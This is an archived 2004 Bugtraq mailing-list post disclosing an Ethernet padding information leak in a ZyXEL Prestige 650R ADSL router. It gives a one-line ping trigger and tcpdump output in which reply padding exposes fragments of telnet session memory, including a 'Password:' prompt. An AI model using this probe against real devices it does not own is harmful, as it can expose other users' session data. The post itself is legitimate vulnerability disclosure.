[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1076157724.2533.20.camel@station>
Date: Sat, 07 Feb 2004 13:42:05 +0100
From: DiSToAGe <distoage@...i.net>
To: bugtraq@...urityfocus.com
Subject: [Fwd: zyxel prestige ethernet information leakage]
I sent a mail to the vendor, without response , so here it is.
In the exemple here you can see informations about the telnet interface
previously connected to.
Note the problem do not only exist with icmp packet but seems to be in
ACK packet on TCP too. I don't know if the problem exist only on the LAN
side or if the bad padding is added on the ADSL side too, so
informations can be seen by remote hosts.
I don't know if other model are vulnerable too.
>
> Hi,
>
> Some ethernet interface have security problems : information leakage
> please see CERT vulnerability #412115
>
> http://www.kb.cert.org/vuls/id/412115
>
> It say that Zyxel devices with ZyNOS v.2.50 to v.3.60 are not vulnerable
> but it isn't true.
>
> Here you can see report with a Zyxel prestige 650R-11 ADSL router.
>
> Name: Router
> Routing: IP
> ZyNOS F/W Version: V3.40(ES.5) | 2/10/2003
> ADSL Chipset Vendor: Alcatel, Version 3.9.122
> Standard: Multi-Mode
>
> send icmp packet with less data than normal so remote interface padd
> with data to complete the frame :
>
> ping -s 0 router
>
> Here is the replies, you can see other portion of memory on replies by
> router :
>
> 10:15:42.904088 router > station: icmp: echo reply
> 0x0000 4500 001c 8ae1 0000 fe01 aeab c0a8 0101 E...............
> 0x0010 c0a8 0102 0000 17f2 e80c 0001 456e 7465 ............Ente
> 0x0020 721b 5b32 313b 3333 484d 656e 751b r.[21;33HMenu.
> 10:15:43.918189 router > station: icmp: echo reply
> 0x0000 4500 001c 8ae2 0000 fe01 aeaa c0a8 0101 E...............
> 0x0010 c0a8 0102 0000 17f1 e80c 0002 6377 437a ............cwCz
> 0x0020 5010 03ff 434b 0000 27ff fc05 fffe P...CK..'.....
> 10:15:44.928354 router > station: icmp: echo reply
> 0x0000 4500 001c 8ae3 0000 fe01 aea9 c0a8 0101 E...............
> 0x0010 c0a8 0102 0000 17f0 e80c 0003 6377 437a ............cwCz
> 0x0020 5010 0400 434a 0000 0204 0200 c0a8 P...CJ........
> 10:15:45.938513 router > station: icmp: echo reply
> 0x0000 4500 001c 8ae4 0000 fe01 aea8 c0a8 0101 E...............
> 0x0010 c0a8 0102 0000 17ef e80c 0004 5061 7373 ............Pass
> 0x0020 776f 7264 3a20 0000 02ac 3c93 c0a8 word:.....<...
> 10:15:46.948675 router > station: icmp: echo reply
> 0x0000 4500 001c 8ae5 0000 fe01 aea7 c0a8 0101 E...............
> 0x0010 c0a8 0102 0000 17ee e80c 0005 6377 437c ............cwC|
> 0x0020 5010 03fe 4349 0000 0204 0200 c0a8 P...CI........
> 10:15:47.958838 router > station: icmp: echo reply
> 0x0000 4500 001c 8ae6 0000 fe01 aea6 c0a8 0101 E...............
> 0x0010 c0a8 0102 0000 17ed e80c 0006 6377 437c ............cwC|
> 0x0020 5010 0400 4347 0000 75dd 6642 c0a8 P...CG..u.fB..
>
>
>
>
Powered by blists - more mailing lists